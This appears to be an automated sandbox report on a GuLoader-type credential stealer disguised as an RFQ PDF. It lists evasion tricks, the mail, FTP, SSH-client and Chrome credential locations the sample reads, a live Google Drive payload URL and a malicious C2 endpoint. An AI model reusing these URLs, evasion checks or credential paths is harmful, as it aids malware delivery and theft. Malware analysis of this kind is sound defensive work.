Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B7F31 NtWriteVirtualMemory, 0_2_020B7F31
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B7F81 NtWriteVirtualMemory, 0_2_020B7F81
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B7FA5 NtWriteVirtualMemory, 0_2_020B7FA5
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B7C3D NtWriteVirtualMemory, 0_2_020B7C3D
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B7C31 NtWriteVirtualMemory, 0_2_020B7C31
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B7C7A NtWriteVirtualMemory, 0_2_020B7C7A
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B7C85 NtWriteVirtualMemory, 0_2_020B7C85
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B7CA9 NtWriteVirtualMemory, 0_2_020B7CA9
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B8CFB NtWriteVirtualMemory, 0_2_020B8CFB
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B7D25 NtWriteVirtualMemory, 0_2_020B7D25
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B7D31 NtWriteVirtualMemory, 0_2_020B7D31
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 8_2_0056FD07 LdrInitializeThunk,NtProtectVirtualMemory, 8_2_0056FD07
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 8_2_0056FEC2 Sleep,LdrInitializeThunk,NtProtectVirtualMemory, 8_2_0056FEC2
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 8_2_0056FD59 NtProtectVirtualMemory, 8_2_0056FD59
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 8_2_0056FD4D NtProtectVirtualMemory, 8_2_0056FD4D
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 8_2_0056FF79 NtProtectVirtualMemory, 8_2_0056FF79
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 8_2_0056FE11 NtProtectVirtualMemory, 8_2_0056FE11
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 8_2_0056FD00 LdrInitializeThunk,NtProtectVirtualMemory, 8_2_0056FD00
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 8_2_0056FF09 NtProtectVirtualMemory, 8_2_0056FF09
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 8_2_0056FD30 NtProtectVirtualMemory, 8_2_0056FD30
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 8_2_0056FC21 LdrInitializeThunk,NtProtectVirtualMemory, 8_2_0056FC21
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 8_2_0056FC96 LdrInitializeThunk,NtProtectVirtualMemory, 8_2_0056FC96
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 8_2_0056FD9D NtProtectVirtualMemory, 8_2_0056FD9D
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 8_2_0056FE85 NtProtectVirtualMemory, 8_2_0056FE85
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 8_2_0056FDB5 NtProtectVirtualMemory, 8_2_0056FDB5
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 8_2_0056FCB9 NtProtectVirtualMemory, 8_2_0056FCB9
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 8_2_0056FCA1 LdrInitializeThunk,NtProtectVirtualMemory, 8_2_0056FCA1
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 8_2_0056FCAD LdrInitializeThunk,NtProtectVirtualMemory, 8_2_0056FCAD
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 8_2_0056FEAD LdrInitializeThunk,NtProtectVirtualMemory, 8_2_0056FEAD
Abnormal high CPU Usage
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Process Stats: CPU usage > 98%
Sample file is different than original file name gathered from version info
Source: RFQ 001030112021#U00b7pdf.exe, 00000000.00000000.670357074.000000000041C000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameForm_Fejlfunkt.exe vs RFQ 001030112021#U00b7pdf.exe
Source: RFQ 001030112021#U00b7pdf.exe, 00000000.00000002.770681442.0000000002960000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameForm_Fejlfunkt.exeFE2X vs RFQ 001030112021#U00b7pdf.exe
Source: RFQ 001030112021#U00b7pdf.exe, 00000008.00000000.769293326.000000000041C000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameForm_Fejlfunkt.exe vs RFQ 001030112021#U00b7pdf.exe
Source: RFQ 001030112021#U00b7pdf.exe Binary or memory string: OriginalFilenameForm_Fejlfunkt.exe vs RFQ 001030112021#U00b7pdf.exe
PE file contains strange resources
Source: RFQ 001030112021#U00b7pdf.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
PE / OLE file has an invalid certificate
Source: RFQ 001030112021#U00b7pdf.exe Static PE information: invalid certificate
Source: RFQ 001030112021#U00b7pdf.exe Metadefender: Detection: 17%
Source: RFQ 001030112021#U00b7pdf.exe ReversingLabs: Detection: 17%
Source: RFQ 001030112021#U00b7pdf.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Section loaded: C:\Windows\SysWOW64\msvbvm60.dll Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe "C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe"
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Process created: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe "C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe"
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Process created: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe "C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe" Jump to behavior
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32 Jump to behavior
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Crypto Jump to behavior
Source: classification engine Classification label: mal100.rans.troj.spyw.evad.winEXE@3/2@2/3
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Mutant created: \Sessions\1\BaseNamedObjects\8F9C4E9C79A3B52B3F739430
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook Jump to behavior

Data Obfuscation:

barindex
Yara detected GuLoader
Source: Yara match File source: 00000000.00000002.770638438.00000000020B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000000.770261395.0000000000560000.00000040.00000001.sdmp, type: MEMORY
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_0040264C push 0040130Eh; ret 0_2_0040265F
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_00402660 push 0040130Eh; ret 0_2_00402673
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_00402674 push 0040130Eh; ret 0_2_00402687
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_0040260D push 0040130Eh; ret 0_2_00402623
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_00408E1D push 0000000Eh; ret 0_2_00408E20
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_00402624 push 0040130Eh; ret 0_2_00402637
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_00402638 push 0040130Eh; ret 0_2_0040264B
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_004026C4 push 0040130Eh; ret 0_2_004026D7
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_004026D8 push 0040130Eh; ret 0_2_004026EB
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_004026EC push 0040130Eh; ret 0_2_004026FF
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_00402688 push 0040130Eh; ret 0_2_0040269B
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_0040269C push 0040130Eh; ret 0_2_004026AF
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_004076A2 push 0000004Bh; ret 0_2_004076A8
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_004026B0 push 0040130Eh; ret 0_2_004026C3
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_00402750 push 0040130Eh; ret 0_2_00402763
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_00402764 push 0040130Eh; ret 0_2_00402777
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_00402778 push 0040130Eh; ret 0_2_0040278B
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_00408B7E push esp; iretd 0_2_00408B7F
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_00402700 push 0040130Eh; ret 0_2_00402713
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_00402714 push 0040130Eh; ret 0_2_00402727
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_00402728 push 0040130Eh; ret 0_2_0040273B
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_0040273C push 0040130Eh; ret 0_2_0040274F
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_004061E0 push eax; retf 0_2_0040624D
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_0040278C push 0040130Eh; ret 0_2_0040279F
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_004027A0 push 0040130Eh; ret 0_2_004027B3
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B9405 pushad ; retn A0FEh 0_2_020B9941
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B51F2 push ecx; retn 0010h 0_2_020B51A3
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B9629 pushad ; retn A0FEh 0_2_020B9941
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B9635 pushad ; retn A0FEh 0_2_020B9941
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B964D pushad ; retn A0FEh 0_2_020B9941
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B9641 pushad ; retn A0FEh 0_2_020B9941
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Process information set: NOGPFAULTERRORBOX Jump to behavior

Malware Analysis System Evasion:

barindex
Tries to detect Any.run
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe File opened: C:\Program Files\Qemu-ga\qemu-ga.exe Jump to behavior
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe File opened: C:\Program Files\qga\qga.exe Jump to behavior
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe File opened: C:\Program Files\Qemu-ga\qemu-ga.exe Jump to behavior
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe File opened: C:\Program Files\qga\qga.exe Jump to behavior
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: RFQ 001030112021#U00b7pdf.exe, 00000008.00000002.892261911.0000000002420000.00000004.00000001.sdmp Binary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERWININET.DLLMOZILLA/5.0 (WINDOWS NT 6.1; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKOSHELL32ADVAPI32TEMP=HTTPS://DRIVE.GOOGLE.COM/UC?EXPORT=DOWNLOAD&ID=1F5UP5O0CFHZV_GAVQKAQAHPOSXGGLGCB
Source: RFQ 001030112021#U00b7pdf.exe, 00000000.00000002.770672587.00000000028C0000.00000004.00000001.sdmp, RFQ 001030112021#U00b7pdf.exe, 00000008.00000002.892261911.0000000002420000.00000004.00000001.sdmp Binary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
Source: RFQ 001030112021#U00b7pdf.exe, 00000000.00000002.770672587.00000000028C0000.00000004.00000001.sdmp Binary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERWININET.DLLMOZILLA/5.0 (WINDOWS NT 6.1; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKOSHELL32ADVAPI32TEMP=WINDIR=\SYSWOW64\MSVBVM60.DLL
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe TID: 2832 Thread sleep count: 678 > 30 Jump to behavior
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe TID: 4564 Thread sleep time: -60000s >= -30000s Jump to behavior
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Last function: Thread delayed
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Window / User API: threadDelayed 678 Jump to behavior
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Thread delayed: delay time: 60000 Jump to behavior
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe System information queried: ModuleInformation Jump to behavior
Source: RFQ 001030112021#U00b7pdf.exe, 00000000.00000002.770756711.0000000002B6A000.00000004.00000001.sdmp, RFQ 001030112021#U00b7pdf.exe, 00000008.00000002.892290801.000000000262A000.00000004.00000001.sdmp Binary or memory string: Hyper-V Guest Shutdown Service
Source: RFQ 001030112021#U00b7pdf.exe, 00000000.00000002.770672587.00000000028C0000.00000004.00000001.sdmp Binary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublisherwininet.dllMozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Geckoshell32advapi32TEMP=windir=\syswow64\msvbvm60.dll
Source: RFQ 001030112021#U00b7pdf.exe, 00000008.00000002.895483253.000000001E728000.00000004.00000001.sdmp, RFQ 001030112021#U00b7pdf.exe, 00000008.00000002.892164333.00000000009D7000.00000004.00000020.sdmp Binary or memory string: Hyper-V RAWV
Source: RFQ 001030112021#U00b7pdf.exe, 00000000.00000002.770756711.0000000002B6A000.00000004.00000001.sdmp, RFQ 001030112021#U00b7pdf.exe, 00000008.00000002.892290801.000000000262A000.00000004.00000001.sdmp Binary or memory string: Hyper-V Remote Desktop Virtualization Service
Source: RFQ 001030112021#U00b7pdf.exe, 00000008.00000002.892290801.000000000262A000.00000004.00000001.sdmp Binary or memory string: vmicshutdown
Source: RFQ 001030112021#U00b7pdf.exe, 00000000.00000002.770756711.0000000002B6A000.00000004.00000001.sdmp, RFQ 001030112021#U00b7pdf.exe, 00000008.00000002.892290801.000000000262A000.00000004.00000001.sdmp Binary or memory string: Hyper-V Volume Shadow Copy Requestor
Source: RFQ 001030112021#U00b7pdf.exe, 00000000.00000002.770756711.0000000002B6A000.00000004.00000001.sdmp, RFQ 001030112021#U00b7pdf.exe, 00000008.00000002.892290801.000000000262A000.00000004.00000001.sdmp Binary or memory string: Hyper-V PowerShell Direct Service
Source: RFQ 001030112021#U00b7pdf.exe, 00000000.00000002.770756711.0000000002B6A000.00000004.00000001.sdmp, RFQ 001030112021#U00b7pdf.exe, 00000008.00000002.892290801.000000000262A000.00000004.00000001.sdmp Binary or memory string: Hyper-V Time Synchronization Service
Source: RFQ 001030112021#U00b7pdf.exe, 00000008.00000002.892290801.000000000262A000.00000004.00000001.sdmp Binary or memory string: vmicvss
Source: RFQ 001030112021#U00b7pdf.exe, 00000008.00000002.895453741.000000001E6F8000.00000004.00000001.sdmp, RFQ 001030112021#U00b7pdf.exe, 00000008.00000002.895483253.000000001E728000.00000004.00000001.sdmp, RFQ 001030112021#U00b7pdf.exe, 00000008.00000002.892121972.0000000000987000.00000004.00000020.sdmp, RFQ 001030112021#U00b7pdf.exe, 00000008.00000002.892164333.00000000009D7000.00000004.00000020.sdmp Binary or memory string: Hyper-V RAW
Source: RFQ 001030112021#U00b7pdf.exe, 00000000.00000002.770672587.00000000028C0000.00000004.00000001.sdmp, RFQ 001030112021#U00b7pdf.exe, 00000008.00000002.892261911.0000000002420000.00000004.00000001.sdmp Binary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
Source: RFQ 001030112021#U00b7pdf.exe, 00000000.00000002.770756711.0000000002B6A000.00000004.00000001.sdmp, RFQ 001030112021#U00b7pdf.exe, 00000008.00000002.892290801.000000000262A000.00000004.00000001.sdmp Binary or memory string: Hyper-V Data Exchange Service
Source: RFQ 001030112021#U00b7pdf.exe, 00000000.00000002.770756711.0000000002B6A000.00000004.00000001.sdmp, RFQ 001030112021#U00b7pdf.exe, 00000008.00000002.892290801.000000000262A000.00000004.00000001.sdmp Binary or memory string: Hyper-V Heartbeat Service
Source: RFQ 001030112021#U00b7pdf.exe, 00000000.00000002.770756711.0000000002B6A000.00000004.00000001.sdmp, RFQ 001030112021#U00b7pdf.exe, 00000008.00000002.892290801.000000000262A000.00000004.00000001.sdmp Binary or memory string: Hyper-V Guest Service Interface
Source: RFQ 001030112021#U00b7pdf.exe, 00000008.00000002.892290801.000000000262A000.00000004.00000001.sdmp Binary or memory string: vmicheartbeat
Source: RFQ 001030112021#U00b7pdf.exe, 00000008.00000002.892261911.0000000002420000.00000004.00000001.sdmp Binary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublisherwininet.dllMozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Geckoshell32advapi32TEMP=https://drive.google.com/uc?export=download&id=1f5uP5o0CfHZv_GAVqkAqahPOSxgGlgCb

Anti Debugging:

barindex
Hides threads from debuggers
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Thread information set: HideFromDebugger Jump to behavior
Enables debug privileges
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Process token adjusted: Debug Jump to behavior
Contains functionality to read the PEB
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020BC7BF mov eax, dword ptr fs:[00000030h] 0_2_020BC7BF
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020BBAA1 mov eax, dword ptr fs:[00000030h] 0_2_020BBAA1
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020BDB82 mov eax, dword ptr fs:[00000030h] 0_2_020BDB82
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020BD872 mov eax, dword ptr fs:[00000030h] 0_2_020BD872
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B8F54 mov eax, dword ptr fs:[00000030h] 0_2_020B8F54
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020BA6B9 LdrInitializeThunk, 0_2_020BA6B9

HIPS / PFW / Operating System Protection Evasion:

barindex
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Process created: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe "C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe" Jump to behavior
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information:

barindex
GuLoader behavior detected
Source: Initial file Signature Results: GuLoader behavior
Tries to steal Mail credentials (via file / registry access)
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities Jump to behavior
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook Jump to behavior
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Key opened: HKEY_CURRENT_USER\Software\9bis.com\KiTTY\Sessions Jump to behavior
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl Jump to behavior
Tries to harvest and steal ftp login credentials
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe File opened: HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\Hosts Jump to behavior
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe File opened: HKEY_CURRENT_USER\Software\NCH Software\ClassicFTP\FTPAccounts Jump to behavior
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe File opened: HKEY_CURRENT_USER\Software\Far\Plugins\FTP\Hosts Jump to behavior
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
windows-stand
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
63.250.34.171
 unknown United States
22612 NAMECHEAP-NETUS true
216.58.198.33
 googlehosted.l.googleusercontent.com United States
15169 GOOGLEUS false
142.250.180.110
 drive.google.com United States
15169 GOOGLEUS false

Contacted Domains

Name IP Active
drive.google.com 142.250.180.110 true
googlehosted.l.googleusercontent.com 216.58.198.33 true
doc-00-50-docs.googleusercontent.com unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://63.250.34.171/tickets.php?id=277 true
  • 9%, Virustotal, Browse
  • Avira URL Cloud: safe
 unknown
https://doc-00-50-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/tmgkbuuoqg7e2eb3u8b2c66mt8m0nijc/1638356250000/03026244708369606156/*/1f5uP5o0CfHZv_GAVqkAqahPOSxgGlgCb?e=download false
    		high